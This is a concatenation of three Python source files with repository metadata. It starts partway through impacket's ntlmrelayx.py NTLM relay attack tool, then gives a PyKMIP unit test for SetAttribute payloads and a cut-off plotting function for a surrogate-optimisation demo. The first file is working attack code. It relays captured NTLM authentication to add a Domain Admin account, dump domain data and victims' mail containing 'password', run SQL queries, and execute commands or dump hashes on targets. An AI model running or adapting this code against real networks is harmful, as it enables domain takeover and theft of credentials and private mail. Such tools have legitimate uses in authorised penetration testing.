res = self.client.connection.modify(dagroupdn, {
'member': [(self.client.MODIFY_ADD, ['CN=%s,CN=Users,%s' % (newUser, domainDumper.root)])]})
if res:
logging.info('Adding user: %s to group Domain Admins result: OK' % newUser)
                logging.info('Domain Admin privileges acquired, shutting down...')
addedDomainAdmin = True
thread.interrupt_main()
else:
logging.error('Failed to add user to Domain Admins group: %s' % str(self.client.connection.result))
def run(self):
global dumpedDomain
#Set up a default config
domainDumpConfig = self.ldapdomaindump.domainDumpConfig()
#Change the output directory to configured rootdir
domainDumpConfig.basepath = self.config.lootdir
#Create new dumper object
domainDumper = self.ldapdomaindump.domainDumper(self.client.server, self.client.connection, domainDumpConfig)
if domainDumper.isDomainAdmin(self.username):
logging.info('User is a Domain Admin!')
if self.config.addda:
if 'ldaps' in self.client.target:
self.addDA(domainDumper)
else:
logging.error('Connection to LDAP server does not use LDAPS, to enable adding a DA specify the target with ldaps:// instead of ldap://')
else:
logging.info('Not adding a new Domain Admin because of configuration options')
else:
logging.info('User is not a Domain Admin')
if not dumpedDomain and self.config.dumpdomain:
#do this before the dump is complete because of the time this can take
dumpedDomain = True
logging.info('Dumping domain info for first time')
domainDumper.domainDump()
logging.info('Domain info dumped into lootdir!')
class HTTPAttack(Thread):
def __init__(self, config, HTTPClient, username):
Thread.__init__(self)
self.daemon = True
self.config = config
self.client = HTTPClient
self.username = username
def run(self):
#Default action: Dump requested page to file, named username-targetname.html
#You can also request any page on the server via self.client.session,
#for example with:
#result = self.client.session.get('http://secretserver/secretpage.html')
#print result.content
#Remove protocol from target name
safeTargetName = self.client.target.replace('http://','').replace('https://','')
#Replace any special chars in the target name
safeTargetName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', safeTargetName)
#Combine username with filename
fileName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le')) + '-' + safeTargetName + '.html'
#Write it to the file
with open(os.path.join(self.config.lootdir,fileName),'w') as of:
of.write(self.client.lastresult)
class IMAPAttack(Thread):
def __init__(self, config, IMAPClient, username):
Thread.__init__(self)
self.daemon = True
self.config = config
self.client = IMAPClient
self.username = username
def run(self):
#Default action: Search the INBOX for messages with "password" in the header or body
targetBox = self.config.mailbox
result, data = self.client.session.select(targetBox,True) #True indicates readonly
if result != 'OK':
logging.error('Could not open mailbox %s: %s' % (targetBox,data))
logging.info('Opening mailbox INBOX')
targetBox = 'INBOX'
result, data = self.client.session.select(targetBox,True) #True indicates readonly
inboxCount = int(data[0])
logging.info('Found %s messages in mailbox %s' % (inboxCount,targetBox))
#If we should not dump all, search for the keyword
if not self.config.dump_all:
result, rawdata = self.client.session.search(None,'OR','SUBJECT','"%s"' % self.config.keyword,'BODY','"%s"' % self.config.keyword)
#Check if search worked
if result != 'OK':
logging.error('Search failed: %s' % rawdata)
return
dumpMessages = []
#message IDs are separated by spaces
for msgs in rawdata:
dumpMessages += msgs.split(' ')
if self.config.dump_max != 0 and len(dumpMessages) > self.config.dump_max:
dumpMessages = dumpMessages[:self.config.dump_max]
else:
#Dump all mails, up to the maximum number configured
if self.config.dump_max == 0 or self.config.dump_max > inboxCount:
dumpMessages = range(1,inboxCount+1)
else:
dumpMessages = range(1,self.config.dump_max+1)
numMsgs = len(dumpMessages)
if numMsgs == 0:
logging.info('No messages were found containing the search keywords')
else:
logging.info('Dumping %d messages found by search for "%s"' % (numMsgs,self.config.keyword))
for i,msgIndex in enumerate(dumpMessages):
#Fetch the message
result, rawMessage = self.client.session.fetch(msgIndex, '(RFC822)')
if result != 'OK':
logging.error('Could not fetch message with index %s: %s' % (msgIndex,rawMessage))
continue
#Replace any special chars in the mailbox name and username
mailboxName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', targetBox)
textUserName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le'))
#Combine username with mailboxname and mail number
fileName = 'mail_' + textUserName + '-' + mailboxName + '_' + str(msgIndex) + '.eml'
#Write it to the file
with open(os.path.join(self.config.lootdir,fileName),'w') as of:
of.write(rawMessage[0][1])
logging.info('Done fetching message %d/%d' % (i+1,numMsgs))
#Close connection cleanly
self.client.session.logout()
class MSSQLAttack(Thread):
def __init__(self, config, MSSQLClient):
Thread.__init__(self)
self.config = config
self.client = MSSQLClient
def run(self):
if self.config.queries is None:
logging.error('No SQL queries specified for MSSQL relay!')
else:
for query in self.config.queries:
logging.info('Executing SQL: %s' % query)
self.client.sql_query(query)
self.client.printReplies()
self.client.printRows()
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
ATTACKS = { 'SMB': SMBAttack, 'LDAP': LDAPAttack, 'HTTP': HTTPAttack, 'MSSQL': MSSQLAttack, 'IMAP': IMAPAttack}
# Init the example's logger theme
logger.init()
print version.BANNER
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
    parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient/mssqlclient console instead '
                             'of executing a command after a successful relay. This console will listen locally on a '
                             'tcp port and can be reached with for example netcat.')
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when '
'interacting with the domain to grab a session key for signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar = "LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
    mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute '
'(can specify multiple)')
#HTTP options (not in use for now)
# httpoptions = parser.add_argument_group("HTTP client options")
# httpoptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
# '(can specify multiple)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception, e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singletarget=options.target)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetlistfile=options.tf)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump,options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s = server(c)
s.start()
print ""
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
sys.exit(1)
else:
pass
| {
"content_hash": "42dbf07e8a1c963cbebee6345d21a3d4",
"timestamp": "",
"source": "github",
"line_count": 447,
"max_line_length": 160,
"avg_line_length": 48.868008948545864,
"alnum_prop": 0.6111060245376305,
"repo_name": "tholum/PiBunny",
"id": "26f4463c8cdf986ca949be19793bd534775516da",
"size": "23415",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "system.d/library/tools_installer/tools_to_install/impacket/examples/ntlmrelayx.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3527"
},
{
"name": "HTML",
"bytes": "195334"
},
{
"name": "JavaScript",
"bytes": "1156309"
},
{
"name": "PowerShell",
"bytes": "5359"
},
{
"name": "Python",
"bytes": "6368546"
},
{
"name": "Shell",
"bytes": "40720"
},
{
"name": "Visual Basic",
"bytes": "5660"
}
],
"symlink_target": ""
} |
import testtools
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages import payloads
class TestSetAttributeRequestPayload(testtools.TestCase):
"""
A unit test suite for the SetAttribute request payload.
"""
def setUp(self):
super(TestSetAttributeRequestPayload, self).setUp()
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite. It was modified to reflect the new SetAttribute operation
# in KMIP 2.0. The new attribute was manually added.
#
# This encoding matches the following set of values.
# Request Payload
# Unique Identifier - b4faee10-aa2a-4446-8ad4-0881f3422959
# New Attribute
# Cryptographic Algorithm - AES
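        # TTLV layout reminder (comment added for clarity): every field below
        # is a 3-byte tag, a 1-byte type, a 4-byte big-endian length, and a
        # value padded to a multiple of 8 bytes; 0x420094 (type 0x07, text
        # string, 36 bytes) carries the unique identifier and 0x420028 (type
        # 0x05, enumeration, value 0x03 = AES) sits inside the 0x42013D New
        # Attribute structure.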
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x48'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x62\x34\x66\x61\x65\x65\x31\x30\x2D\x61\x61\x32\x61\x2D\x34\x34'
b'\x34\x36\x2D\x38\x61\x64\x34\x2D\x30\x38\x38\x31\x66\x33\x34\x32'
b'\x32\x39\x35\x39\x00\x00\x00\x00'
b'\x42\x01\x3D\x01\x00\x00\x00\x10'
b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
)
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite. It was modified to reflect the new SetAttribute operation
# in KMIP 2.0. The new attribute was manually added and the unique
# identifier was removed.
#
# This encoding matches the following set of values.
# Request Payload
# New Attribute
# Cryptographic Algorithm - AES
self.no_unique_identifier_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x18'
b'\x42\x01\x3D\x01\x00\x00\x00\x10'
b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
)
self.empty_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x00'
)
def tearDown(self):
super(TestSetAttributeRequestPayload, self).tearDown()
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a SetAttribute request payload.
"""
kwargs = {"unique_identifier": 0}
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
payloads.SetAttributeRequestPayload,
**kwargs
)
args = (
payloads.SetAttributeRequestPayload(),
"unique_identifier",
0
)
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
setattr,
*args
)
def test_invalid_new_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the new attribute of a SetAttribute request payload.
"""
kwargs = {"new_attribute": "invalid"}
self.assertRaisesRegex(
TypeError,
"The new attribute must be a NewAttribute object.",
payloads.SetAttributeRequestPayload,
**kwargs
)
args = (
payloads.SetAttributeRequestPayload(),
"new_attribute",
"invalid"
)
self.assertRaisesRegex(
TypeError,
"The new attribute must be a NewAttribute object.",
setattr,
*args
)
def test_read(self):
"""
Test that a SetAttribute request payload can be read from a buffer.
"""
payload = payloads.SetAttributeRequestPayload()
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.new_attribute)
payload.read(self.full_encoding)
self.assertEqual(
"b4faee10-aa2a-4446-8ad4-0881f3422959",
payload.unique_identifier
)
self.assertEqual(
objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
payload.new_attribute
)
def test_read_no_unique_identifier(self):
"""
Test that a SetAttribute request payload can be read from a buffer
even when the encoding is missing the unique identifier field.
"""
payload = payloads.SetAttributeRequestPayload()
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.new_attribute)
payload.read(self.no_unique_identifier_encoding)
self.assertIsNone(payload.unique_identifier)
self.assertEqual(
objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
payload.new_attribute
)
def test_read_no_new_attribute(self):
"""
Test that an InvalidKmipEncoding error is raised when an invalid
encoding containing no encoded new attribute is used to decode
a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
args = (self.empty_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The SetAttribute request payload encoding is missing the "
"new attribute field.",
payload.read,
*args
)
def test_read_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to decode the SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
args = (self.empty_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.read,
*args,
**kwargs
)
def test_write(self):
"""
Test that a SetAttribute request payload can be written to a buffer.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.full_encoding), len(buffer))
self.assertEqual(str(self.full_encoding), str(buffer))
def test_write_no_unique_identifier(self):
"""
Test that a SetAttribute request payload can be written to a buffer
without the unique identifier field.
"""
payload = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.no_unique_identifier_encoding), len(buffer))
self.assertEqual(str(self.no_unique_identifier_encoding), str(buffer))
def test_write_no_new_attribute(self):
"""
Test that an InvalidField error is raised when attempting to write
a SetAttribute request payload to a buffer with no new attribute
field specified.
"""
payload = payloads.SetAttributeRequestPayload()
args = (utils.BytearrayStream(), )
self.assertRaisesRegex(
exceptions.InvalidField,
"The SetAttribute request payload is missing the new attribute "
"field.",
payload.write,
*args
)
def test_write_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to encode the SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
args = (utils.BytearrayStream(), )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.write,
*args,
**kwargs
)
def test_repr(self):
"""
Test that repr can be applied to a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=None
)
args = [
"unique_identifier='b4faee10-aa2a-4446-8ad4-0881f3422959'",
"new_attribute=None"
]
self.assertEqual(
"SetAttributeRequestPayload({})".format(", ".join(args)),
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=None
)
s = str(
{
"unique_identifier": "b4faee10-aa2a-4446-8ad4-0881f3422959",
"new_attribute": None
}
)
self.assertEqual(s, str(payload))
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two SetAttribute request payloads with the same data.
"""
a = payloads.SetAttributeRequestPayload()
b = payloads.SetAttributeRequestPayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
b = payloads.SetAttributeRequestPayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_unique_identifiers(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute request payloads with different unique
identifiers.
"""
a = payloads.SetAttributeRequestPayload(unique_identifier="1")
b = payloads.SetAttributeRequestPayload(unique_identifier="2")
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_different_new_attributes(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute request payloads with different new
attributes.
"""
a = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
)
b = payloads.SetAttributeRequestPayload(
new_attribute=objects.NewAttribute(
attribute=primitives.Integer(
128,
enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
        comparing a SetAttribute request payload against a different type.
"""
a = payloads.SetAttributeRequestPayload()
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
class TestSetAttributeResponsePayload(testtools.TestCase):
"""
A unit test suite for the SetAttribute response payload.
"""
def setUp(self):
super(TestSetAttributeResponsePayload, self).setUp()
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite.
#
# This encoding matches the following set of values:
# Response Payload
# Unique Identifier - b4faee10-aa2a-4446-8ad4-0881f3422959
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x30'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x62\x34\x66\x61\x65\x65\x31\x30\x2D\x61\x61\x32\x61\x2D\x34\x34'
b'\x34\x36\x2D\x38\x61\x64\x34\x2D\x30\x38\x38\x31\x66\x33\x34\x32'
b'\x32\x39\x35\x39\x00\x00\x00\x00'
)
self.empty_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x00'
)
def tearDown(self):
super(TestSetAttributeResponsePayload, self).tearDown()
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a SetAttribute response payload.
"""
kwargs = {"unique_identifier": 0}
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
payloads.SetAttributeResponsePayload,
**kwargs
)
args = (
payloads.SetAttributeResponsePayload(),
"unique_identifier",
0
)
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
setattr,
*args
)
def test_read(self):
"""
Test that a SetAttribute response payload can be read from a buffer.
"""
payload = payloads.SetAttributeResponsePayload()
self.assertIsNone(payload.unique_identifier)
payload.read(self.full_encoding)
self.assertEqual(
"b4faee10-aa2a-4446-8ad4-0881f3422959",
payload.unique_identifier
)
def test_read_no_unique_identifier(self):
"""
Test that an InvalidKmipEncoding error is raised when an invalid
encoding containing no encoded unique identifier is used to decode
a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (self.empty_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The SetAttribute response payload encoding is missing the "
"unique identifier field.",
payload.read,
*args
)
def test_read_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to decode the SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (self.empty_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.read,
*args,
**kwargs
)
def test_write(self):
"""
Test that a SetAttribute response payload can be written to a
buffer.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
buffer = utils.BytearrayStream()
payload.write(buffer)
self.assertEqual(len(self.full_encoding), len(buffer))
self.assertEqual(str(self.full_encoding), str(buffer))
def test_write_no_unique_identifier(self):
"""
Test that an InvalidField error is raised when attempting to write
a SetAttribute response payload to a buffer with no unique
identifier field specified.
"""
payload = payloads.SetAttributeResponsePayload()
args = (utils.BytearrayStream(), )
self.assertRaisesRegex(
exceptions.InvalidField,
"The SetAttribute response payload is missing the unique "
"identifier field.",
payload.write,
*args
)
def test_write_invalid_kmip_version(self):
"""
Test that a VersionNotSupported error is raised when an unsupported
version of KMIP is used to encode the SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload()
args = (utils.BytearrayStream(), )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_1_0}
self.assertRaisesRegex(
exceptions.VersionNotSupported,
"KMIP 1.0 does not support the SetAttribute operation.",
payload.write,
*args,
**kwargs
)
def test_repr(self):
"""
Test that repr can be applied to a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
args = [
"unique_identifier='b4faee10-aa2a-4446-8ad4-0881f3422959'"
]
self.assertEqual(
"SetAttributeResponsePayload({})".format(", ".join(args)),
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a SetAttribute response payload.
"""
payload = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
s = str(
{
"unique_identifier": "b4faee10-aa2a-4446-8ad4-0881f3422959"
}
)
self.assertEqual(s, str(payload))
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two SetAttribute response payloads with the same data.
"""
a = payloads.SetAttributeResponsePayload()
b = payloads.SetAttributeResponsePayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
b = payloads.SetAttributeResponsePayload(
unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959"
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_unique_identifiers(self):
"""
Test that the equality/inequality operators return False/True when
comparing two SetAttribute response payloads with different unique
identifiers.
"""
a = payloads.SetAttributeResponsePayload(unique_identifier="1")
b = payloads.SetAttributeResponsePayload(unique_identifier="2")
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
        comparing a SetAttribute response payload against a different
type.
"""
a = payloads.SetAttributeResponsePayload()
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
| {
"content_hash": "5f1c9eff1aea2609d276127d99cd155b",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 79,
"avg_line_length": 34.06666666666667,
"alnum_prop": 0.5928618022551486,
"repo_name": "OpenKMIP/PyKMIP",
"id": "bb113fa9e614c5c65afc22a7a9b3544478cf752d",
"size": "22108",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/tests/unit/core/messages/payloads/test_set_attribute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5552888"
},
{
"name": "Shell",
"bytes": "1214"
}
],
"symlink_target": ""
} |
"""Plotting function for the example 2D problem.
"""
import numpy as np
import math
import utils
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
def plot(proof, slice_, grid_size, dim_limits, slice_samples_X, slice_samples_Y, past_slices, samples_X, samples_Y):
"""Plots the state after a sample evaluation round.
    The figure has 2 rows and 2 columns:
    - The first row shows 2D plots:
        the true function and the surrogate representation, each with the current slice.
    - The second row shows 1D plots:
        the true function + Expected Improvement, and
        the true function + Surrogate + Uncertainty.
    The surrogate representation also shows the sample points.
    The title contains the 2D as well as the 1D slice test errors.
"""
prediction, uncertainty, expected_improvement = proof[0], proof[1], proof[2]
fig = plt.figure(figsize=(20, 20))
gs = gridspec.GridSpec(2, 2)
d = np.array(dim_limits).shape[1]
grid = utils.get_grid(grid_size, dim_limits)
Y = utils.six_hump_camel(grid)
grid = utils.scale_01(grid, dim_limits)
indices = np.isclose(grid[:, d-1], slice_)
grid_1D = np.linspace(0, 1, grid_size)
true_1D = Y[indices]
pred_1D = prediction[indices]
uncert_1D = uncertainty[indices]
expimp_1D = expected_improvement[indices]
xlim = (-0.01, 1.01)
# True function
ax = fig.add_subplot(gs[0], projection='3d')
ax.plot(grid_1D, np.ones(grid_size)*slice_, true_1D, 'b-', label='Current Slice', lw=2)
for i in past_slices:
indices_ = np.isclose(grid[:, d-1], i)
true_1D_ = Y[indices_]
ax.plot(grid_1D, np.ones(grid_size)*i, true_1D_, 'b--', alpha=1.0-(i/1.6), lw=2)
_ax_plot3D(ax, grid, Y, cm.Blues)
ax.scatter(samples_X[:, 0], samples_X[:, 1], samples_Y, c='r', label='Samples', s=50)
ax.set_title('Original Function')
ax.legend(loc='upper left')
# Surrogate + slice
ax = fig.add_subplot(gs[1], projection='3d')
ax.plot(grid_1D, np.ones(grid_size)*slice_, pred_1D, 'b-', label='Current Slice', lw=2)
for i in past_slices:
indices_ = np.isclose(grid[:, d-1], i)
pred_1D_ = prediction[indices_]
ax.plot(grid_1D, np.ones(grid_size)*i, pred_1D_, 'b--', alpha=1.0-(i/1.6), lw=2)
_ax_plot3D(ax, grid, prediction, cm.Greens)
ax.scatter(slice_samples_X[:, 0], slice_samples_X[:, 1], slice_samples_Y, c='r', label='Samples in Slice', s=50)
ax.set_title('Surrogate Model')
ax.legend(loc='upper left')
ax.legend(loc='lower right')
# True function + Expected Improvement
ax = fig.add_subplot(gs[2])
ax.plot(grid_1D, true_1D, 'r--', label='Original Curve')
ax.plot(grid_1D, expimp_1D/np.max(expimp_1D), '-', color='darkred', label='Expected Improvement')
ax.set_xlim(xlim)
ax.legend(loc='upper left')
# True function + Surrogate + Uncertainty
